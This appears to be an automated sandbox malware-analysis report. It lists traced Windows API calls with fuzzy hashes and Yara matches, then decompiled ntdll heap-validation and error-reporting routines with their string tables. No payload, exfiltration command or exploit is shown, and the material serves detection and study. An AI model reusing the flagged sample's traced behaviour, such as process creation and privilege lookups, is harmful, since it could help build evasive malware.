                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                    • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                    • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                    • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                    • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                    • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessInternalW.KERNELBASE(00408CBD,00408CE5,00408A7D,00000010,00408CE5,00000044,?,?,?,00000044,00408CE5,00000010,00408A7D,00408CE5,00408CBD,00408D29), ref: 0041A734
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID:
                    • API String ID: 2186235152-0
                    • Opcode ID: 8d3d2534ead5815c3546b0fe9166efda06e9cd63d4074ea357af0417f930f132
                    • Instruction ID: d57bfb07a31592aee336ab9fb530e9007d0cfbe6c90ab69b17bc1a672a393ba5
                    • Opcode Fuzzy Hash: 8d3d2534ead5815c3546b0fe9166efda06e9cd63d4074ea357af0417f930f132
                    • Instruction Fuzzy Hash: 8401B2B6211108BFCB58DF89DC80EEB37ADAF8C754F158258FA0D97241D630E851CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessInternalW.KERNELBASE(00408CBD,00408CE5,00408A7D,00000010,00408CE5,00000044,?,?,?,00000044,00408CE5,00000010,00408A7D,00408CE5,00408CBD,00408D29), ref: 0041A734
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID:
                    • API String ID: 2186235152-0
                    • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                    • Instruction ID: c0409bc591760e5b86b1b32807d612366400da8e17bcb8cc8f9e0bcd0fd11a44
                    • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                    • Instruction Fuzzy Hash: C601B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: ab5ee3665b620248444aa617e35fa004a2146ed7dfca3b241a30780ad4b87341
                    • Instruction ID: 56c4b5e02524ab4bf5cb25986af385b2c1844a2ef70cf53d5aa9dae5b3172efb
                    • Opcode Fuzzy Hash: ab5ee3665b620248444aa617e35fa004a2146ed7dfca3b241a30780ad4b87341
                    • Instruction Fuzzy Hash: 57F0A0B52422046BC714DF54DC41FE73B68AF89650F188054FE5817342D534A955CBF1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: a412c1437e812e873039ac27d450f2e254bc5ffaa80d983b6e0a5e7fb88b6b2b
                    • Instruction ID: fb9b73ff83cf81d9195f7fa7dbc6aab40189a8dc13e1fe4736f4157c0808c4f7
                    • Opcode Fuzzy Hash: a412c1437e812e873039ac27d450f2e254bc5ffaa80d983b6e0a5e7fb88b6b2b
                    • Instruction Fuzzy Hash: BCF0A9B6200240AFDB24DF24CC89EA7BBA8EF88314F14418CFC094B241C234F820CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                    • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                    • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                    • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                    • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                    • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                    • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 93c0c2ebfd329cf2e1e44b9e2b62c04be01f57ff422a89f0c0354644e0d8f46b
                    • Instruction ID: 69a11c6c9b46b0977293601f8d75dea4949f5ddf2bf54c090adc8d6635b71c82
                    • Opcode Fuzzy Hash: 93c0c2ebfd329cf2e1e44b9e2b62c04be01f57ff422a89f0c0354644e0d8f46b
                    • Instruction Fuzzy Hash: C0B09B719015D5C5D651D7A446087177A4077D4755F36C451D2420741F477CC491F6B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Strings
                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0108B314
                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0108B2F3
                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0108B305
                    • a NULL pointer, xrefs: 0108B4E0
                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0108B323
                    • This failed because of error %Ix., xrefs: 0108B446
                    • *** Inpage error in %ws:%s, xrefs: 0108B418
                    • The resource is owned exclusively by thread %p, xrefs: 0108B374
                    • *** enter .exr %p for the exception record, xrefs: 0108B4F1
                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0108B53F
                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0108B484
                    • The instruction at %p referenced memory at %p., xrefs: 0108B432
                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0108B476
                    • *** then kb to get the faulting stack, xrefs: 0108B51C
                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0108B47D
                    • *** Resource timeout (%p) in %ws:%s, xrefs: 0108B352
                    • *** enter .cxr %p for the context, xrefs: 0108B50D
                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0108B2DC
                    • an invalid address, %p, xrefs: 0108B4CF
                    • <unknown>, xrefs: 0108B27E, 0108B2D1, 0108B350, 0108B399, 0108B417, 0108B48E
                    • The resource is owned shared by %d threads, xrefs: 0108B37E
                    • Go determine why that thread has not released the critical section., xrefs: 0108B3C5
                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0108B39B
                    • write to, xrefs: 0108B4A6
                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0108B38F
                    • *** An Access Violation occurred in %ws:%s, xrefs: 0108B48F
                    • The instruction at %p tried to %s , xrefs: 0108B4B6
                    • The critical section is owned by thread %p., xrefs: 0108B3B9
                    • read from, xrefs: 0108B4AD, 0108B4B2
                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0108B3D6
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                    • API String ID: 0-108210295
                    • Opcode ID: 3b8d5e0b64b443b129de6262d4565d133c7e92460859c0c9ce05b71224ef1294
                    • Instruction ID: 5b420bb727f9f86c33c0c0e26b75ed2a8ca09bfde6c9f6d75e47d8af0f9ab8f9
                    • Opcode Fuzzy Hash: 3b8d5e0b64b443b129de6262d4565d133c7e92460859c0c9ce05b71224ef1294
                    • Instruction Fuzzy Hash: DE812371A44201FFDB216A089C57EAF3B69FF56BA1F004098F5C42B152D765C511E6B2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 44%
                    			E01091C06() {
                    				signed int _t27;
                    				char* _t104;
                    				char* _t105;
                    				intOrPtr _t113;
                    				intOrPtr _t115;
                    				intOrPtr _t117;
                    				intOrPtr _t119;
                    				intOrPtr _t120;
                    
                    				_t105 = 0xfb48a4;
                    				_t104 = "HEAP: ";
                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    					_push(_t104);
                    					E00FDB150();
                    				} else {
                    					E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    				}
                    				_push( *0x10c589c);
                    				E00FDB150("Heap error detected at %p (heap handle %p)\n",  *0x10c58a0);
                    				_t27 =  *0x10c5898; // 0x0
                    				if(_t27 <= 0xf) {
                    					switch( *((intOrPtr*)(_t27 * 4 +  &M01091E96))) {
                    						case 0:
                    							_t105 = "heap_failure_internal";
                    							goto L21;
                    						case 1:
                    							goto L21;
                    						case 2:
                    							goto L21;
                    						case 3:
                    							goto L21;
                    						case 4:
                    							goto L21;
                    						case 5:
                    							goto L21;
                    						case 6:
                    							goto L21;
                    						case 7:
                    							goto L21;
                    						case 8:
                    							goto L21;
                    						case 9:
                    							goto L21;
                    						case 0xa:
                    							goto L21;
                    						case 0xb:
                    							goto L21;
                    						case 0xc:
                    							goto L21;
                    						case 0xd:
                    							goto L21;
                    						case 0xe:
                    							goto L21;
                    						case 0xf:
                    							goto L21;
                    					}
                    				}
                    				L21:
                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    					_push(_t104);
                    					E00FDB150();
                    				} else {
                    					E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    				}
                    				_push(_t105);
                    				E00FDB150("Error code: %d - %s\n",  *0x10c5898);
                    				_t113 =  *0x10c58a4; // 0x0
                    				if(_t113 != 0) {
                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    						_push(_t104);
                    						E00FDB150();
                    					} else {
                    						E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					E00FDB150("Parameter1: %p\n",  *0x10c58a4);
                    				}
                    				_t115 =  *0x10c58a8; // 0x0
                    				if(_t115 != 0) {
                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    						_push(_t104);
                    						E00FDB150();
                    					} else {
                    						E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					E00FDB150("Parameter2: %p\n",  *0x10c58a8);
                    				}
                    				_t117 =  *0x10c58ac; // 0x0
                    				if(_t117 != 0) {
                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    						_push(_t104);
                    						E00FDB150();
                    					} else {
                    						E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					E00FDB150("Parameter3: %p\n",  *0x10c58ac);
                    				}
                    				_t119 =  *0x10c58b0; // 0x0
                    				if(_t119 != 0) {
                    					L41:
                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    						_push(_t104);
                    						E00FDB150();
                    					} else {
                    						E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					_push( *0x10c58b4);
                    					E00FDB150("Last known valid blocks: before - %p, after - %p\n",  *0x10c58b0);
                    				} else {
                    					_t120 =  *0x10c58b4; // 0x0
                    					if(_t120 != 0) {
                    						goto L41;
                    					}
                    				}
                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    					_push(_t104);
                    					E00FDB150();
                    				} else {
                    					E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    				}
                    				return E00FDB150("Stack trace available at %p\n", 0x10c58c0);
                    			}

                    Instruction addresses:
                    0x01091c10, 0x01091c16, 0x01091c1e, 0x01091c3d, 0x01091c3e, 0x01091c20, 0x01091c35, 0x01091c3a,
                    0x01091c44, 0x01091c55, 0x01091c5a, 0x01091c65, 0x01091c67, 0x00000000, 0x01091c6e, 0x00000000,
                    0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
                    0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
                    0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
                    0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x01091c67,
                    0x01091cdc, 0x01091ce5, 0x01091d04, 0x01091d05, 0x01091ce7, 0x01091cfc, 0x01091d01, 0x01091d0b,
                    0x01091d17, 0x01091d1f, 0x01091d25, 0x01091d30, 0x01091d4f, 0x01091d50, 0x01091d32, 0x01091d47,
                    0x01091d4c, 0x01091d61, 0x01091d67, 0x01091d68, 0x01091d6e, 0x01091d79, 0x01091d98, 0x01091d99,
                    0x01091d7b, 0x01091d90, 0x01091d95, 0x01091daa, 0x01091db0, 0x01091db1, 0x01091db7, 0x01091dc2,
                    0x01091de1, 0x01091de2, 0x01091dc4, 0x01091dd9, 0x01091dde, 0x01091df3, 0x01091df9, 0x01091dfa,
                    0x01091e00, 0x01091e0a, 0x01091e13, 0x01091e32, 0x01091e33, 0x01091e15, 0x01091e2a, 0x01091e2f,
                    0x01091e39, 0x01091e4a, 0x01091e02, 0x01091e02, 0x01091e08, 0x00000000, 0x00000000, 0x01091e08,
                    0x01091e5b, 0x01091e7a, 0x01091e7b, 0x01091e5d, 0x01091e72, 0x01091e77, 0x01091e95

                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                    • API String ID: 0-2897834094
                    • Opcode ID: 6a6701ed5fba7c46e71202cc9f81b93f5e459e6c51d463eb4d1379f33c59eb8e
                    • Instruction ID: fc6b579d69ea51beb7f462247e2b2c8293cf76db3716d84e433823c731b1414b
                    • Opcode Fuzzy Hash: 6a6701ed5fba7c46e71202cc9f81b93f5e459e6c51d463eb4d1379f33c59eb8e
                    • Instruction Fuzzy Hash: 0861B53A725187DFDB12AB44D966E2573E5E704B31B0E807EF449AB352C63D9840BF0A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 59%
                    			E01094AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                    				signed int _v6;
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t189;
                    				intOrPtr _t191;
                    				intOrPtr _t210;
                    				signed int _t225;
                    				signed char _t231;
                    				intOrPtr _t232;
                    				unsigned int _t245;
                    				intOrPtr _t249;
                    				intOrPtr _t259;
                    				signed int _t281;
                    				signed int _t283;
                    				intOrPtr _t284;
                    				signed int _t288;
                    				signed int* _t294;
                    				signed int* _t298;
                    				intOrPtr* _t299;
                    				intOrPtr* _t300;
                    				signed int _t307;
                    				signed int _t309;
                    				signed short _t312;
                    				signed short _t315;
                    				signed int _t317;
                    				signed int _t320;
                    				signed int _t322;
                    				signed int _t326;
                    				signed int _t327;
                    				void* _t328;
                    				signed int _t332;
                    				signed int _t340;
                    				signed int _t342;
                    				signed char _t344;
                    				signed int* _t345;
                    				void* _t346;
                    				signed char _t352;
                    				signed char _t367;
                    				signed int _t374;
                    				intOrPtr* _t378;
                    				signed int _t380;
                    				signed int _t385;
                    				signed char _t390;
                    				unsigned int _t392;
                    				signed char _t395;
                    				unsigned int _t397;
                    				intOrPtr* _t400;
                    				signed int _t402;
                    				signed int _t405;
                    				intOrPtr* _t406;
                    				signed int _t407;
                    				intOrPtr _t412;
                    				void* _t414;
                    				signed int _t415;
                    				signed int _t416;
                    				signed int _t429;
                    
                    				_v16 = _v16 & 0x00000000;
                    				_t189 = 0;
                    				_v8 = _v8 & 0;
                    				_t332 = __edx;
                    				_v12 = 0;
                    				_t414 = __ecx;
                    				_t415 = __edx;
                    				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                    					L88:
                    					_t416 = _v16;
                    					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                    						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                    						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                    							L107:
                    							return 1;
                    						}
                    						_t191 =  *[fs:0x30];
                    						__eflags =  *(_t191 + 0xc);
                    						if( *(_t191 + 0xc) == 0) {
                    							_push("HEAP: ");
                    							E00FDB150();
                    						} else {
                    							E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    						}
                    						_push(_v12);
                    						_push( *((intOrPtr*)(_t332 + 0x30)));
                    						_push(_t332);
                    						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                    						L122:
                    						E00FDB150();
                    						L119:
                    						return 0;
                    					}
                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    						_push("HEAP: ");
                    						E00FDB150();
                    					} else {
                    						E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					_push(_t416);
                    					_push( *((intOrPtr*)(_t332 + 0x2c)));
                    					_push(_t332);
                    					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                    					goto L122;
                    				} else {
                    					goto L1;
                    				}
                    				do {
                    					L1:
                    					 *_a16 = _t415;
                    					if( *(_t414 + 0x4c) != 0) {
                    						_t392 =  *(_t414 + 0x50) ^  *_t415;
                    						 *_t415 = _t392;
                    						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                    						_t424 = _t392 >> 0x18 - _t352;
                    						if(_t392 >> 0x18 != _t352) {
                    							_push(_t352);
                    							E0108FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                    						}
                    					}
                    					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                    						_t210 =  *[fs:0x30];
                    						__eflags =  *(_t210 + 0xc);
                    						if( *(_t210 + 0xc) == 0) {
                    							_push("HEAP: ");
                    							E00FDB150();
                    						} else {
                    							E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    						}
                    						_push(_v8 & 0x0000ffff);
                    						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                    						__eflags = _t340;
                    						_push(_t340);
                    						E00FDB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                    						L117:
                    						__eflags =  *(_t414 + 0x4c);
                    						if( *(_t414 + 0x4c) != 0) {
                    							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                    							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                    							__eflags =  *_t415;
                    						}
                    						goto L119;
                    					}
                    					_t225 =  *_t415 & 0x0000ffff;
                    					_t390 =  *(_t415 + 2);
                    					_t342 = _t225;
                    					_v8 = _t342;
                    					_v20 = _t342;
                    					_v28 = _t225 << 3;
                    					if((_t390 & 0x00000001) == 0) {
                    						__eflags =  *(_t414 + 0x40) & 0x00000040;
                    						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                    						__eflags = _t344 & 0x00000001;
                    						if((_t344 & 0x00000001) == 0) {
                    							L66:
                    							_t345 = _a12;
                    							 *_a8 =  *_a8 + 1;
                    							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                    							__eflags =  *_t345;
                    							L67:
                    							_t231 =  *(_t415 + 6);
                    							if(_t231 == 0) {
                    								_t346 = _t414;
                    							} else {
                    								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                    							}
                    							if(_t346 != _t332) {
                    								_t232 =  *[fs:0x30];
                    								__eflags =  *(_t232 + 0xc);
                    								if( *(_t232 + 0xc) == 0) {
                    									_push("HEAP: ");
                    									E00FDB150();
                    								} else {
                    									E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    								}
                    								_push( *(_t415 + 6) & 0x000000ff);
                    								_push(_t415);
                    								_push("Heap block at %p has incorrect segment offset (%x)\n");
                    								goto L95;
                    							} else {
                    								if( *((char*)(_t415 + 7)) != 3) {
                    									__eflags =  *(_t414 + 0x4c);
                    									if( *(_t414 + 0x4c) != 0) {
                    										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                    										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                    										__eflags =  *_t415;
                    									}
                    									_t415 = _t415 + _v28;
                    									__eflags = _t415;
                    									goto L86;
                    								}
                    								_t245 =  *(_t415 + 0x1c);
                    								if(_t245 == 0) {
                    									_t395 =  *_t415 & 0x0000ffff;
                    									_v6 = _t395 >> 8;
                    									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
                    									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                    										__eflags =  *(_t414 + 0x4c);
                    										if( *(_t414 + 0x4c) != 0) {
                    											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                    											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                    											__eflags =  *_t415;
                    										}
                    										goto L107;
                    									}
                    									_t249 =  *[fs:0x30];
                    									__eflags =  *(_t249 + 0xc);
                    									if( *(_t249 + 0xc) == 0) {
                    										_push("HEAP: ");
                    										E00FDB150();
                    									} else {
                    										E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    									}
                    									_push( *((intOrPtr*)(_t332 + 0x28)));
                    									_push(_t415);
                    									_push("Heap block at %p is not last block in segment (%p)\n");
                    									L95:
                    									E00FDB150();
                    									goto L117;
                    								}
                    								_v12 = _v12 + 1;
                    								_v16 = _v16 + (_t245 >> 0xc);
                    								if( *(_t414 + 0x4c) != 0) {
                    									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                    									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                    								}
                    								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                    								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                    									L82:
                    									_v8 = _v8 & 0x00000000;
                    									goto L86;
                    								} else {
                    									if( *(_t414 + 0x4c) != 0) {
                    										_t397 =  *(_t414 + 0x50) ^  *_t415;
                    										 *_t415 = _t397;
                    										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                    										_t442 = _t397 >> 0x18 - _t367;
                    										if(_t397 >> 0x18 != _t367) {
                    											_push(_t367);
                    											E0108FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                    										}
                    									}
                    									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                    										_t259 =  *[fs:0x30];
                    										__eflags =  *(_t259 + 0xc);
                    										if( *(_t259 + 0xc) == 0) {
                    											_push("HEAP: ");
                    											E00FDB150();
                    										} else {
                    											E00FDB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    										}
                    										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                    										_push(_t415);
                    										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                    										goto L95;
                    									} else {
                    										if( *(_t414 + 0x4c) != 0) {
